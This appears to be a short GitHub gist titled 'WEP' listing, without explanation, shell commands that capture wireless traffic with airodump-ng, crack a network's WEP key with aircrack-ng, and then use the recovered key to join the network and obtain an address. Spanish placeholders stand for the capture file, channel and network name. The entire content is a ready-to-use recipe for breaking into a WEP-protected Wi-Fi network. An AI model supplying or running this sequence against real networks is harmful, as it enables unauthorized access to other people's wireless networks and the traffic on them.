Created
March 26, 2013 15:06
-
-
Save cmaureir/5246064 to your computer and use it in GitHub Desktop.
WEP
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ifconfig wlan0 down | |
airodump-ng --ivs -w NOMBRE_ARCHIVO wlan0 | |
airodump-ng --ivs -w NOMBRE_ARCHIVO wlan0 --channel CANAL | |
aircrack-ng -a 1 NOMBRE_ARCHIVO.ivs | |
iwconfig wlan0 essid NOMBRE_RED | |
iwconfig wlan0 key XXXXXXXXXXXX | |
ifconfig wlan0 up | |
dhcpcd wlan0 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment